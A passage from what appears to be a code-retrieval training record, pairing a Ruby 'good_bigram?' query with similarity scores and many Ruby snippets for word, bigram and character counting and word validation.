Don't include the last word in the title\n\t\t\t\t\t\tif w_index > words.length - 2\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\tend\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\t\tputs \"Finished. Bigram model built.\\n\"\n\trescue\n\t\traise\n\t\tSTDERR.puts \"Could not open file\"\n\t\texit 4\n\tend\nend",
"def word_count(all_lines_from_file)\n all_lines_from_file.split.length\nend",
"def process_file(file_name)\n\tputs \"Processing File.... \"\n\t#begin\n\t#processes file at each line\n\tIO.foreach(file_name) do |line|\n\t\t#cleans up song title\n\t\tline = cleanup_title(line)\n\t\t#prevents a nil error with a cleaned up song\n\t\tif line != nil\n\t\t\t#removes stop words from line\n\t\t\tline = cleanupStopWords(line)\n\t\t\t#creates an array of bigrams as found on stackoverflow.com\n\t\t\tbigramArray = line.split.each_cons(2) do |e|\n\t\t\t\t#checks if the bigram exists\n\t\t\t\tif e[0] && e[1] != nil\n\t\t\t\t\t#makes a count from the existing bigram hash value\n\t\t\t\t\tcount = $bigrams[e[0]][e[1]]\n\t\t\t\t\tcount += 1\n\t\t\t\t\t#sets bigram hash value to updated count\n\t\t\t\t\t$bigrams[e[0]][e[1]] = count\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\tend\n\tputs \"Finished. Bigram model built.\\n\"\nrescue\n\tSTDERR.puts \"Could not open file\"\n\texit 4\nend",
"def word_count(text)\n\tnew_text = text.split(\" \") #-->Use text.split to turn text into an array that breaks(splits) at each space.\n\t\n \tcounter = Hash.new(0) #-->Next create an empty hash for your results with count = Hash.new (0)\n\n \tnew_text.each {|word| counter[word] += 1} #-->Use a method that will take each word in the array\n\n \tputs counter #-->This will give us our results printed on the screen\nend",
"def bigram_count()\n\t@corpus.each { |sentence_arr|\n\t prev_word = \"\"\n\t sentence_arr.each { |word|\n\t\tif(prev_word != \"\")\n\t\t @bifreq[prev_word + \" \" + word] += 1\n\t\telse\n\t\t @bifreq[\"PHI \"+word] += 1\n\t\tend \t \t\n\t\tprev_word = word\n\t }\n\t}\n end",
"def analyse(file_path)\n fixed = 0\n words = []\n File.open(file_path, \"r:iso-8859-1\") do |f|\n words = f.readlines(sep=\" \")\n words.dup.each_with_index do |word, i|\n word.delete!(\" \")\n match, dist = @tree.best word.downcase\n if !match.nil? && dist != 0\n fixed+=1\n words[i] = capitalize_if_needed(word, match)\n # puts \"#{word} - #{match}\"\n end\n end\n end\n # print \"file: #{file_path}\\nwords: #{words.size}\\nfixed words:#{((fixed.to_f/(words.size).to_f)*100).round(2)}%\\n\"\n save words, file_path\n end",
"def learn_from_line line\n tokens = tokenize(line)\n\n count_tag_unigrams @tag_unigram_counts, tokens\n count_word_tag_unigrams @word_tag_unigram_counts, tokens\n\n count_tag_bigrams @tag_bigram_counts, tokens\n count_tag_trigrams @tag_trigram_counts, tokens\n\n count_tag_bigrams @tag_skip1_bigram_counts, tokens, gap=1\n end",
"def scan\n $stderr.print \"[words] \"\n\n files.each do |file|\n if $DEBUG\n $stderr.print \"\\n[scan] #{file}\"\n else\n $stderr.print \".\"\n end\n\n text = File.read(file).gsub(\"\\n\", \" \")\n states = text.split(/[.,:;?!()\"]\\s*/)\n\n states.each do |state|\n state.scan(WORD) do |word|\n word = normalize(word)\n if valid_word?(word)\n\t\t self[word] ||= Word.new(word)\n\t\t self[word].file!(file)\n end\n end\n end\n end\n\n $stderr.puts\n end",
"def file_stats\n\t\ttest_parser = PbfParser.new(file)\n\t\tunless test_parser.nodes.empty?\n\t\t\t@n_count+= test_parser.nodes.size\n\t\tend\n\t\tunless test_parser.ways.empty?\n\t\t\t@w_count+= test_parser.ways.size\n\t\tend\n\t\tunless test_parser.relations.empty?\n\t\t\t@r_count+= test_parser.relations.size\n\t\tend\n\t\twhile test_parser.next\n\t\t\tunless test_parser.nodes.empty?\n\t\t\t\t@n_count+= test_parser.nodes.size\n\t\t\tend\n\t\t\tunless test_parser.ways.empty?\n\t\t\t\t@w_count+= test_parser.ways.size\n\t\t\tend\n\t\t\tunless test_parser.relations.empty?\n\t\t\t\t@r_count+= test_parser.relations.size\n\t\t\tend\n\t\tend\n\t\tputs \"=============================================================\"\n\t\tputs \"Nodes: #{n_count}, Ways: #{w_count}, Relations: #{r_count}\\n\"\n\t\tputs \"=============================================================\\n\"\n\tend",
"def visit_file(name)\n\t\ttrigram = []\n\t\tFile.open(name).each { |line|\n\t\t\ttrigram.push line.chomp\n\t\t\tif trigram.length > 3\n\t\t\t\ttrigram.shift\n\t\t\tend\n\t\t\tif trigram.length == 3\n\t\t\t\tt = Array.new(trigram)\n\t\t\t\t@trigram_counts[t] = 1 + @trigram_counts[t] \n\t\t\tend\n\t\t}\n\tend",
"def train texts\n model = Hash.new(0)\n texts.each do |text|\n File.new(text).read.downcase.scan(/[a-z]+/).each do |word|\n model[word] += 1\n end\n end\n return model\nend",
"def tally!(file_count)\n table.each do |spelling, word|\n word.tally!(table.size, file_count)\n end\n end",
"def word_count(file_name, line)\n #file_array = []\n count_words_hash = {}\n line_index = 0\n\n while line_index <= line\n line_text = rio(\"hamlet.txt\").lines[line_index]\n line_array_index0 = line_text[0]\n words_array = line_array_index0.split(\" \")\n\n #puts \"Line array string: #{line_array_index0}\"\n words_array.each do |word|\n #puts \"Line text: #{line_text}, word: #{word}, index: #{line_index}\"\n if !count_words_hash.has_key?(word)\n count_words_hash[word] = 0\n end\n count_words_hash[word] += 1\n end #end array each loop\n line_index += 1\n end #end while loop\n puts \"Final hash: #{count_words_hash}\"\n\n return count_words_hash\n\nend",
"def word_count_tracker\n a_file = File.open('words.txt')\n words = Hash.new(0)\n a_file.each do |line|\n \tarray = line_to_array(line)\n \tarray.each do |word|\n \t words[word.downcase] += 1\t\n \tend\n end\n a_file.close\n puts \"please enter the desired word\"\n word = gets.chomp.downcase\n puts \"#{word} appears #{words[word]} time(s)\"\n puts \"\\n#{words}\" \nend",
"def word_count\n #need to modify regex to account for apostrophes\n text = (@text.gsub!(/\\W+|\\d/,' ').split(\" \"))\n word_count = Hash.new(0)\n text.each do |word|\n word = word.downcase\n word_count[word] +=1\n end\n word_count\n end",
"def tally!(file_count)\n @table.each do |words, bigram|\n bigram.tally!(table.size, file_count)\n end\n end",
"def process(output)\n read_tokens\n count_tokens\n sort_counts\n write_counts(output)\n end",
"def wc(filename)\n input = File.open(filename, 'r') {|f| f.read() }\n puts(\"%d lines\" % [input.each_line.count])\n puts(\"%d words\" % [input.split(' ').count])\n puts(\"%d chars\" % [input.split('').count])\nend",
"def count_tokens()\n @counts = Hash.new(0)\n @tokens.each do |token|\n @counts[token] += 1\n end\n @counts\n end",
"def count_words\n string = self.squish.downcase.gsub(/[^a-z0-9\\s]/i, '')\n string = string.split(\" \")\n words = Hash.new(0)\n string.each { |x|\n words[x] +=1;\n }\n return words\n end",
"def word_sizes(text)\n word_size = Hash.new(0)\n words = text.split\n words.each { |word| word_size[word.size] += 1 }\n word_size\nend",
"def each_word_count(text)\n word_counts = {}\n normalize(text).each do |word|\n word_counts[word] = 0 if !word_counts[word]\n word_counts[word] += 1\n end\n word_counts\nend",
"def count_words\n # clean up string\n str = self.downcase.gsub(/[^a-z0-9\\s]/, '') # only keep letters, numbers, and whitespace\n str = str.gsub(/\\s+/m, ' ') # remove excess whitespace\n\n # add each word to the hash\n hash = Hash.new(0)\n str.split.each do |word|\n hash[word] += 1\n end\n\n hash\n end",
"def shakespeare_counter(file,dictionary)\n nums = Array.new(dictionary.length,0)\n results = dictionary.zip(nums).to_h\n File.open(file,'r') do |f|\n f.each_line do |line|\n line.downcase.split().each do |word|\n if results.key?(word)\n results[word] +=1\n end\n end\n end\n end\n return results.reject{|k,v| v==0}\nend",
"def trigram_count()\n\t@corpus.each { |sentence_arr|\n\t prev_word_1 = \"\"\n\t prev_word_2 = \"\"\n\t sentence_arr.each { |word|\n\t\tif(prev_word_1 != \"\" && prev_word_2 != \"\")\n\t\t @trifreq[prev_word_1 + \" \" + prev_word_2 + \" \" + word] += 1\n\t\telsif(prev_word_1 == \"\" && prev_word_2 != \"\")\n\t\t @trifreq[\"PHI \"+prev_word_2+\" \"+word] += 1\n\t\telsif(prev_word_1 == \"\" && prev_word_2 == \"\")\n\t\t @trifreq[\"PHI PHI \"+word] += 1\t\n\t\tend \t \t\n\t\tprev_word_1 = prev_word_2 \n\t\tprev_word_2 = word\n\t }\n\t}\n end",
"def count_sentences\n array = self.split(/[.!?]\\s/)\n array.count\n end",
"def process_file(file_name)\n\tputs \"Processing File.... \"\n\n\tbegin\n\t\tIO.foreach(file_name) do |line|\n\t\t\tsong = cleanup_title(line)\n\n\t\t\tif not song.nil? and song =~ /^[\\d\\w\\s']+$/\n\t\t\t\tsong = song.downcase\n\t\t\t\tsong.gsub!(/ {2}/, \" \")\n\t\t\t\tsong = remove_stop_words(song)\n\t\t\t\twords = song.split(\" \");\n\n\t\t\t\tupdate_bigram_counts(words)\n\t\t\tend\n\t\tend\n\n\t\tputs \"Finished. Bigram model built.\\n\\n\"\n\trescue\n\t\tSTDERR.puts \"Could not open file\"\n\t\texit 4\n\tend\nend",
"def word_sizes(text)\n word_size = Hash.new(0)\n text.split.map do |word|\n word.delete \"^A-Za-z\"\n word_size[word.size] += 1\n end\n word_size\nend",
"def process_file(file_name)\n\n\t# local variables declaration\n\n\t# start time of this program\n t_1 = Time.now\n \n title = nil\n\n\tputs \"Processing File.... \"\n\t\n\tbegin\n\t\tIO.foreach(file_name) do |line|\n\t\t\t# do something for each line\n\t\t\t\n\t\t\t# call the cleanup_title method and pass the line\n\t\t\t# the cleanup_title method will return cleaned up string\n\t\t\t# the cleaned up string will be stored in the title variable\n\t\t\t# title = cleanup_title(line)\n\t\t\ttitle = cleanup_title(line)\n\n\t\t\tif title != nil && title != \"\"\n\t\t\t\tbuildBigram(title)\n createWordsList(title)\n\t\t\tend\n\t\t\t\n\t\t\t\n\n\t\tend\n\n\t\tputs \"Finished. Bigram model built.\\n\"\n\n # print total amount of titles\n puts \"\\n=======================================\"\n\t\tputs \"Total number of Titels: #{$counter_1}\\n\"\n\n\t\t# end time of this program\n\t\tt_2 = Time.now\n\n\t\t# calculate time needed for computing\n\t\tt_3 = t_2 - t_1\n\n\t\t# print computing time\n puts \"Computing Time: #{t_3}\"\n puts \"=======================================\\n\\n\"\n \n\t\t#countWords()\n\t\t#printWords()\n\t\t#printBigram()\n\t\t#printTitles()\n\n\t\tmcw(\"love\")\n\n\n\trescue\n\t\tSTDERR.puts \"Could not open file\"\n\t\texit 4\n\tend\nend",
"def count_word_occurrences(text = '')\n count = {}\n text.encode(@encoding).downcase.split.each do |word|\n stemmed_word = (@skip_stemming) ? word : word.stem_porter\n unless stopwords.include? stemmed_word\n count[stemmed_word] = count[stemmed_word] ? count[stemmed_word] + 1 : 1\n end\n end\n count\n end",
"def word_sizes(sentence)\n words = Hash.new(0)\n sentence.split.each {|x| words[x.count(\"A-Za-z\")] += 1}\n words\nend",
"def word_count\n words = @input.downcase.scan(/\\b[\\w']+\\b/)\n\n words.each_with_object(Hash.new(0)) do |word, result|\n result[word] += 1\n end\n end",
"def word_sizes(sentence)\n sentence.split.each_with_object(Hash.new(0)) { |word, obj| obj[word.size] += 1 } \nend",
"def analysis\n @str = params[:text] ||= '解析対象の文字列'\n @words = Tag.counter(Tag.generate(@str))\n end",
"def word_stats(force_recount = false)\n process_words unless @num_words && @num_words > 0 && force_recount\n {\n :num_words => @num_words,\n :num_sentences => @num_sentences,\n :num_blanks => @num_blanks,\n :num_blanks_by_type => @num_blanks_by_type\n }\n end",
"def make_hash_with_count(passage)\n array_from_excerpt = strip_text(passage)#input from first question\n names_and_counts = Hash.new 0 #initializes at 0\n array_from_excerpt.each do |word|\n names_and_counts[word] += 1#for all subs. occurences, add 1\n end\n names_and_counts # must have the last line return the array!\nend",
"def sentence_count(all_lines_from_file)\n all_lines_from_file.split(/\\.|\\?|\\!/).length\nend",
"def score(s)\n count = 0\n s.split.each do |word|\n count += 1 if @words.include?(word)\n end\n count\n end",
"def word_counts(text)\n\tword_list = text.split(WORD_SPLIT)\n\tcounts = Hash.new(0)\n\tword_list.each { |word| counts[word] += 1 }\n\treturn counts\nend",
"def update_bigram_counts(words)\n\t(0..(words.length - 2)).each do |i|\n\t\tkey = words[i]\n\t\tif $bigrams.has_key? key\n\t\t\tcounts = $bigrams[key]\n\t\t\tif counts.has_key? words[i + 1]\n\t\t\t\tcounts[words[i + 1]] += 1\n\t\t\telse\n\t\t\t\tcounts[words[i + 1]] = 1\n\t\t\tend\n\t\telse\n\t\t\tcounts = {words[i + 1] => 1}\n\t\t\t$bigrams[key] = counts\n\t\tend\n\tend\nend",
"def word_count(statement)\n words = {}\n wordsArr = statement.split(\" \")\n\n wordsArr.each do |word_key|\n words[word_key] ||= 0\n words[word_key] += 1\n end\n words\nend",
"def analyze_file\n File.foreach('test.txt') do |line|\n @@i = @@i + 1\n #puts line\n new_line = LineAnalyzer.new(line, @@i)\n #puts new_line.highest_wf_count\n #puts \"#{new_line.highest_wf_words} #{new_line.highest_wf_count}\"\n @analyzers << new_line\n end\n end",
"def calculate_nice_words (users)\n\thappy_word = Hash.new(0)\n\tfile_name = \"happywords.txt\"\n\tyour_happy_Words = []\n\tFile.open(file_name, \"r\").each_line do |line|\n\t\tline.strip.split(' ' || '\\t').each do |s|\n\t\t\thappy_word[s] = 1\n\t\tend \n\tend\n\thappy_count = 0\n\tusers.each do |user|\n\t\tuser[\"text\"].strip.split(' ').each do |s|\n\t\t\tif happy_word[s] == 1 then\n\t\t\t\tnewWordObj= Word.new(s, user[\"text\"])\n\t\t\t\tyour_happy_Words.push(newWordObj)\n\t\t\tend\n\t\tend\n\tend\n\tyour_happy_Words\nend",
"def number_of_stats_skillz(text)\n result = 0\n @statistics_skillz.each do |s|\n if text.downcase.include?(s)\n result += 1\n end\n end\n return result\nend",
"def get_possible_words(file_path, known_anagram)\n possible_words = {}\n possible_chars = {}\n known_anagram.each_char do |c|\n possible_chars[c] = possible_chars.key?(c) ? possible_chars[c] + 1 : 1;\n end\n\n IO.foreach(file_path).each do |word|\n word.chomp!\n chars = {}\n word.each_char do |c|\n chars[c] = chars.key?(c) ? chars[c] + 1 : 1;\n end\n\n is_possible_word = true\n chars.keys.each do |c|\n if !possible_chars.key?(c) || chars[c] > possible_chars[c]\n is_possible_word = false\n break\n end\n end\n\n possible_words[word] = 1 if is_possible_word\n end\n\n possible_words\nend",
"def stream2count(io)\n\tcount = Hash.new(0)\n\tsize = 0\n\tnextLimit = 1_000_000\n\twhile not io.eof? \n\t\tline = io.readline\n\t\tline.downcase!\n\n\t\tline.scan(/\\w+/) do |w|\n\t\t\tcount[w] += 1\n\t\tend\n\t\t\n\t\tsize += line.size\n\t\tif size > nextLimit\n\t\t\tputs \"#{size} words indexed.\"\n\t\t\tnextLimit += 1_000_000\n\t\tend\n\tend\n\t\n\tputs \"delete..\"\n\t# remove single entries\n\tcount.each do |key, val|\n\t\tcount.delete key if val<=1\n\tend\n\tputs \"del done\"\n\tcount\nend",
"def initialize(text_file_name)\n @dictionary = Hash.new 0 \n #read file text_file_name\n #extract words from string (file contents) using method 'words' below.\n #put in dictionary with their frequency (calling train! method)\n File.open(text_file_name) do |f|\n f.each_line do |line|\n words = line.split\n words.each do |word|\n \n train! words word\n\n end\n end\n end\n end",
"def count_summary(text)\n all = 0\n counts = Hash.new\n text.each_char do |ch|\n next if ch == ' '\n\n if !counts[ch] then\n counts[ch] = 1\n else\n counts[ch] += 1\n end\n\n all += 1\n end\n\n ARR.each do |ch|\n if ! counts[ch] then\n counts[ch] = 0\n end\n end\n counts\nend",
"def frequency\n counts = Hash.new(0)\n self.words.each { |word| counts[word] += 1 }\n counts\n end",
"def count_occurance(text='')\n raise \"input must be instance of String\" unless text.is_a?(String)\n\n text_chunks = text.downcase.gsub(ONE_OR_TWO_WORDS_RE, '').gsub(NON_ALPHANUMERIC_AND_NON_DOT_RE, ' ').gsub(@stopwords.to_re, '').gsub(/\\./, '').split\n text_chunks.inject(Hash.new(0)) do |container, word|\n container[word] += 1; container\n end\n end",
"def word_count\n\t\tputs \"There are #{@dictionary_analyzer.word_count(@dictionary)} words in this dictionary.\"\n\tend",
"def time_file (doc2, estimate)\n\n#Hash to store the count of [Next], [Submit], etc.\n\tcounthash = Hash.new\n\tcounthash[\"[Next]\"] = 0\n\tcounthash[\"[Submit]\"] = 0\n\n#TO DO: update so that it finds the search criteria from the entered keywords\n# Count the number of [Next]s, [Submit, Long]s\n# and multiply by the time assigned to each keyword\n\tdoc2.paragraphs.each do |p|\n\t\tcounthash[\"[Next]\"] += 6*p.to_s.scan(/(\\[(n|N)ext)|((n|N)ext\\])/).size\n\t\tcounthash[\"[Submit]\"] += estimate*p.to_s.scan(/\\[(S|s)ubmit/).size\n\tend\n\n#prints times associated with [Next], [Submit, *], etc.\n\treturn counthash\n\nend",
"def charFreq(someFile)\ntext = \"\"\nFile.open(someFile, 'r') do |file|\n text = file.to_a.to_s.downcase.gsub(/[^a-z\\s]/, '')\nend\n\nfreq = {}\nchar = text.split(\"\")\nfreq = char.uniq.each{|c| freq[c] = char.count(c)}\n\ncounts = {}\nfor c in char \n if counts.key?(c)\n counts[c] += 1\n else \n counts[c] = 1\n end\nend \n\nprint(counts)\nend",
"def count_frequencies s\n s.downcase.split(//).inject(Hash.new(0)) do |hash,item|\n hash[item] += 1\n hash\n end\n end",
"def word_count_mr\n self.words = Hash[self.class.where(:_id=>self.id).map_reduce(MapReduce::word_count(\"title\"),MapReduce::word_count_reduce).out(inline:1).collect { |x,y| [ x[\"_id\"],x[\"value\"][\"count\"].to_i ] }]\n end",
"def word_count(passage, unique: false)\n !unique ? strip_text(passage).count : strip_text_unique(passage).count# words = rows here\nend",
"def count_words(string)\n#names=string.downcase.split(/\\W+/)\n#puts names\ncounts = Hash.new(0)\nstring.downcase.split(/\\W+/).each { |name| counts[name] += 1 }\nputs counts\nend",
"def count_words(phrase)\r\n words_hash = Hash.new(0)\r\n phrase.split(\" \").each do |word|\r\n words_hash[word.downcase]+=1\r\n end\r\n print_word_count(words_hash)\r\n return words_hash\r\nend",
"def words_count\n get_at_words_count + \n get_ata_words_count + \n get_noun_words_count + \n get_adjective_words_count\n end",
"def count_sentences(some_file)\n file_content = open(some_file).read()\n count = 0\n\n file_content.each_char do |c|\n count += 1 if c == \",\" || c == \"?\" || c == \"!\"\n end\n return count\nend",
"def calculate_word_count\n 0x0A\n end",
"def ngram_counts_context(str, n)\n seqs = word_seqs(str)\n cnts = Hash.new(0.0)\n seqs.each do |words|\n next if words.length<n\n toks = words.map(&:downcase)\n shifted = []\n (1...n).each{ |i| shifted << toks[i..-1] }\n n_grams = toks.zip(*shifted).select{ |n_gram| n_gram.select{ |w| w=~ /^[[:alpha:]]+$/ }.length==n }\n n_grams.each{ |n_gram| cnts[\"#{n}w:#{n_gram.join('_')}\"]+=1 }\n end\n cnts\n end",
"def scanner\n @sentences ||= File.open(@path) do |file|\n file.each_line.each_with_object([]) do |line, acc|\n stripped_line = line.strip\n\n unless stripped_line.nil? || stripped_line.empty?\n acc << line.split(' ').map do |word|\n word.split('/').first\n end.join(' ')\n end\n end\n end\n\n end",
"def readwordfile name\r\n\t\t \tl_num=0\r\n\t\t File.open(name).each do |l|\r\n\t\t \t@wordtable[l_num] = l.gsub(\"\\r\",\"\").gsub(\"\\n\",\"\")\r\n\t\t l_num +=1\r\n\t\t end\r\n\t\t return l_num\r\n\t\t end",
"def calculate_word_frequency\n # not a class method, it is used to poulate what are essentially properties on an instance of the class\n #word_frequency = @content.split(\" \").each_with_object(Hash.new(0)) {|word,count| count[word] +=1}\n word_frequency = Hash.new(0)\n #puts word_frequency\n @content.split.each do |word|\n word_frequency[word] += 1\n end\n\n\n @highest_wf_count = word_frequency.values.max\n @highest_wf_words = word_frequency.select { |word, freq| freq == @highest_wf_count }.keys\n @highest_wf_words\n\n end",
"def occurences(file) # \n fileString = File.read(file).to_s # the text of the file is stored\n fileString = fileString.chars.sort.join # we sort it\n #puts \"the ordered charactors are\" # \n #puts fileString # \n write_handler = File.new(file+\"_result.out\", \"w\") # create a new file called that _out\n\n # \n result = \"\" # \n values = Hash.new(0) # create new hashtable\n fileString.chars.each do |char| # for each of the chara\\actors\n values[char.to_s] +=1 # add it to the hash\n end # \n values = values.sort_by {|_key, value| value} # sort by lmost common letter\n values = values.reverse # reverse it\n values.each do |val| # for each value\n write_handler.puts val[1].to_s+ \":\"+val[0].to_s # add it to the new file\n end # end\n write_handler.close # close file\n return result # return resullt\nend",
"def count_words(string)\r\n texts = string.split(\" \").map(&:downcase)\r\n result = texts.each_with_object(Hash.new (0)) {|item, hash| hash[item] += 1}\r\n result.each do |key, value|\r\n puts \"#{key} #{value}\"\r\nend\r\nend",
"def word_count_engine(document)\n document = document.gsub(/[^ 0-9A-Za-z]/, '').downcase.split(' ')\n\n store = {}\n max = 0\n\n document.each do |element|\n if store[element]\n store[element] += 1\n max = [store[element], max].max\n else\n store[element] = 1\n max = 1 if max == 0\n end\n end\n\n buckets = Array.new(max) { [] }\n\n store.each do |key, value|\n buckets[max - value].push([key, value.to_s])\n end\n\n buckets.flatten(1)\nend",
"def count\n self.wordcounts.map(&:count).inject(0, :+)\n end",
"def count_words\n @clustered_tweets.each do |cluster, tweets|\n next if cluster == -1 # <--- Skip noise cluster!\n next if cluster == nil # <--- Skip tweets without cluster!\n cluster_wordcounts = Hash.new(0)\n tweets.each do |tweet|\n tweet.text_cleaned.split.each do |token|\n cluster_wordcounts[token] += 1 \n @total_wordcounts[token] += 1\n @total_words += 1\n @cluster_words[cluster] += 1\n end\n @clustered_wordcounts[cluster] = cluster_wordcounts\n end\n end\n end",
"def printWords(file, lines, htmlOutput=false) \ntranslated = []\nFile.open(\"german_vocabulary.c\") { |german| \n translated = german.readlines.collect { |l|\n if l =~ /\\{\"[^\"]*\", (\"[A-Z0-9_]+\")/ then\n $1\n end\n }.uniq\n}\n\ncount = 0\nlines.each { |line|\n if line =~ /\\#define.*NAM_.*(\".*\")/ then\n if not translated.include? $1 then\n puts $1+' nicht uebersetzt!' unless htmlOutput\n count += 1\n end\n end\n}\n\nif htmlOutput then\n puts '<tr>'\n puts ' <td>'+file+'</td>'\n puts ' <td align=\"right\">'+lines.size.to_s+'</td>'\n puts ' <td align=\"right\">'+count.to_s+'</td>'\n puts ' <td align=\"right\">'+sprintf(\"%4d\", lines.size-count)+'</td>'\n puts ' <td align=\"right\">'+sprintf(\"%2g\", (lines.size-count)*100.0/lines.size)+'</td>'\n puts '</tr>'\nelse\n puts\n puts \"Gesamtzahl: \"+sprintf(\"%4d\", lines.size.to_s)\n puts \"Nicht uebersetzte Wort: \"+sprintf(\"%4d\", count.to_s)\n puts \"Uebersetzte Worte: \"+sprintf(\"%4d\", lines.size-count)\n puts \"Prozentual uebersetzt: \"+sprintf(\"%2g\", (lines.size-count)*100.0/lines.size)\nend\n\nend",
"def word_sizes(words)\n count_hash = Hash.new(0)\n words.split.each do |word|\n clean_word = word.delete('^a-zA-Z')\n count_hash[clean_word.size] += 1\n end\n count_hash\nend",
"def analyze_text(text)\n {\n :line_count => (text.split(/\\n/).last.chomp.empty? ? text.scan(/\\n/).count + 1 : text.scan(/\\n/).count),\n :character_count => text.length,\n :character_count_excluding_spaces => text.scan(/\\S/).length,\n :word_count => text.split(' ').length,\n :sentence_count => text.split(/[\\.?!]/).length,\n :paragraph_count => text.split(/\\n\\r/).length\n }\nend",
"def count_words(s)\n\ts = s.downcase\n\ts.gsub!(/\\W+/,\" \")\n\ts = s.split(\" \")\n\tfreqs = Hash.new(0)\n\ts.each{ |word| freqs[word] += 1 }\n\treturn freqs\nend",
"def calculate_total_seqs\n file_summaries.sum(&:seqs)\n end",
"def word_sizes(str)\n counts = Hash.new(0)\n if str == \"\"\n return {}\n else\n str.gsub!(/[^0-9A-Za-z\\s]/, \"\").split.each do |word|\n counts[word.size] += 1\n end\nend\n counts\n\nend"
] | [
"0.6511316",
"0.63263327",
"0.6272771",
"0.62173015",
"0.6199744",
"0.6187189",
"0.6135399",
"0.61326754",
"0.6131588",
"0.61292493",
"0.6123231",
"0.60655224",
"0.6043474",
"0.6039884",
"0.60201246",
"0.60042804",
"0.59944147",
"0.59934443",
"0.599198",
"0.59612584",
"0.5914988",
"0.5909988",
"0.58903164",
"0.5885001",
"0.5833632",
"0.5825421",
"0.57108814",
"0.5703339",
"0.5693465",
"0.56828773",
"0.56780374",
"0.5669561",
"0.56678027",
"0.5635732",
"0.5612363",
"0.5611247",
"0.5599882",
"0.55957603",
"0.55903083",
"0.5587402",
"0.55624115",
"0.553539",
"0.5494202",
"0.54075813",
"0.5406101",
"0.540432",
"0.53987455",
"0.53945094",
"0.5385658",
"0.53625256",
"0.5361262",
"0.5349742",
"0.533589",
"0.5331881",
"0.53288084",
"0.53245527",
"0.5323564",
"0.5323239",
"0.5319054",
"0.53178644",
"0.53148663",
"0.53001434",
"0.5299404",
"0.5297997",
"0.5291313",
"0.5289322",
"0.5288539",
"0.5286719",
"0.5285855",
"0.52809554",
"0.5273894",
"0.52736235",
"0.5270918",
"0.52619123",
"0.525891",
"0.5254168",
"0.5249843",
"0.52411866",
"0.5236999",
"0.5231903",
"0.5226478",
"0.5217072",
"0.52169794",
"0.5214917",
"0.5212541",
"0.52051944",
"0.52026963",
"0.5197943",
"0.51927954",
"0.51895064",
"0.51819193",
"0.5172649",
"0.51706195",
"0.51579964",
"0.5157293",
"0.5143905",
"0.51438844",
"0.51334673",
"0.5127685",
"0.5121705"
] | 0.6242591 | 3 |
Check if a given word should be considered an acceptable bigram. | def good_bigram?(word)
return false if REJECT_BIGRAMS.include?(word)
return false if word.size < 2
true
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def legal_word?(word)\n word.length >= 5 && word.length <= 12\n end",
"def is_word?(word)\r\n word = word.downcase\r\n word.each_char { |c| return false if not is_letter?(c) }\r\n !word.empty?\r\n end",
"def isAntigram(comparedWord)\n String.chars.each(comparedWord)\n end",
"def block_word?(string)\n hash = { 'B' => 'O', 'G' => 'T', 'V' => 'I', \n 'X' => 'K', 'R' => 'E', 'L' => 'Y',\n 'D' => 'Q', 'F' => 'S', 'Z' => 'M',\n 'C' => 'P', 'J' => 'W', 'N' => 'A', 'H' => 'U'}\n\n banned_letters = []\n bool = true\n letters = string.upcase.chars\n letters.each do |letter|\n if hash.has_key?(letter)\n banned_letters << hash[letter]\n elsif hash.has_value?(letter)\n banned_letters << hash.key(letter)\n end\n end\n banned_letters.each do |letter|\n if letters.include?(letter)\n bool = false\n break\n else\n next\n end\n end\n bool\nend",
"def block_word?(word)\n letters = BLOCKS.dup\n chars = word.upcase.chars\n\n chars.each do |char|\n return false unless letters.join.include?(char)\n letters.delete_at(letters.join.index(char)/2)\n end\n\n true\nend",
"def valid_word_guess?(guess)\n if !guess.match?(/\\A([a-z]|[-]|\\d){2,}\\z/) \n puts \"Not a legal word guess! Guess again.\"\n return false\n elsif @incorrect_guesses.include?(guess) || @correct_guesses.include?(guess)\n puts \"You already guessed that word. Guess again.\\n\\n\"\n return false\n else\n return true\n end\n end",
"def check_word(word)\n letters = make_letter_array(@tiles)\n w = word.split(\"\")\n for letter in w\n if letters.index(letter)\n letters[letters.index(letter)] = nil\n letters.compact!\n else\n return false\n end\n end\n return true\n end",
"def cap?(word)\n\t\treturn true if !$dont_cap.include?(word)\n\tend",
"def check_word(word)\n valid_words.include?(word)\n end",
"def block_word?(str)\n return false unless str.chars.uniq.size == str.size\n char_arr = str.upcase.chars\n char_arr.none? { |char| char_arr.include?(BLOCK_PAIRS[char]) }\nend",
"def block_word?(string)\n string_cap = string.upcase\n spelling_blocks = \"BO GT VI XK RE LY DQ FS ZM CP JW NA HU\"\n spelling_blocks.split.none? { |block| string_cap.count(block) >=2}\nend",
"def has_bad_word(str)\n #Turn string (url or body) into UTF-8 and lower case\n new_str = str.force_encoding(\"UTF-8\").downcase\n bad_words = [\"spongebob\",\n \"britney spears\",\n \"paris hilton\",\n \"norrköping\"]\n return bad_words.any? { |word| new_str.include?(word) }\nend",
"def letter_in_word?(letter)\n end",
"def pangram?(str)\n letters = \"abcdefghijklmnopqrstuvwxyz\".split(\"\")\n\n str.downcase!\n\n letters.all? { |letter|\n str.include? (letter)\n }\nend",
"def legal?(word)\n\t\tself.is_length(word) && self.letters?(word) && self.duplicates?(word) # Will return true or false if given word is legal/not legal\n\tend",
"def easy_block_word?(word)\n word.chars.all? { |letter| BLOCKS.join.include?(letter) }\nend",
"def validate_word_match\n if valid_word?(@word)\n return true\n else return false \n end#this should be returning true or false\n end",
"def pangram?(s)\n y = s.downcase.split(//).sort.uniq\n y.keep_if { |i| i =~ /[a-z]/ }\n y.length == 26 ? true : false\nend",
"def validate_word(word)\n\n # Remove the spaces from the ends of the words and chop it into characters\n chars = word.chomp.split('')\n invalid = false\n\n # Check if the word or input is 5 characters, Reject it if its not\n if chars.length != 5\n invalid = true\n end\n\n # See if the character appears in the word more than once, otherwise use regex`s to test for numbers and characters\n # The first regex uses the shorthand \\W which looks for anything that is NOT [0-9a-zA-Z_] as a quick way to wittle\n # out characters such as !@. The second looks for anything that IS a number. the match method is used to check if\n # your character matches any of the regex conditions.\n # It is worth noting these checks will always be run UNLESS invalid has already been flipped to true.\n # If any of these evaluate, flip invalid to true\n chars.each do |char|\n unless invalid\n invalid = true if word.count(char) > 1 || char.match(/\\W/) || char.match(/[0-9]/)\n end\n end\n\n #return wether the word is valid or not the word is valid\n return invalid\n\n end",
"def proper(word)\n /[[:upper:]]/.match(word) != nil\n end",
